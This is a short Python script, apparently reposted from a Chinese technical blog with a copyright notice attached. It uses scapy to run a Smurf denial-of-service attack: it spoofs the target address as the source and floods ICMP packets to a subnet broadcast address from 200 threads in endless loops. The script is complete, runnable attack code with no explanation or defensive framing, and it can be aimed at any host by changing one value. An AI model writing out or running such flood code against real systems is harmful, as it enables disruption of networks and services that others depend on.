from scapy.all import *
from time import sleep
import _thread
import random
target = '192.168.113.100'
threadnum = 200
def smurf(target):
while True:
send(IP(src=target, dst="192.168.113.255")/ICMP(), count=100, verbose=0)
def attack(target):
print ("Start Attack...")
for i in range(threadnum):
_thread.start_new_thread(smurf, (target, ))
while True:
sleep(1)
attack(target)
版权声明:本文内容来自第三方投稿或授权转载,原文地址:https://blog.51cto.com/u_13283563/5138043,作者:程序小黑,版权归原作者所有。本网站转在其作品的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如因作品内容、版权等问题需要同本网站联系,请发邮件至ctyunbbs@chinatelecom.cn沟通。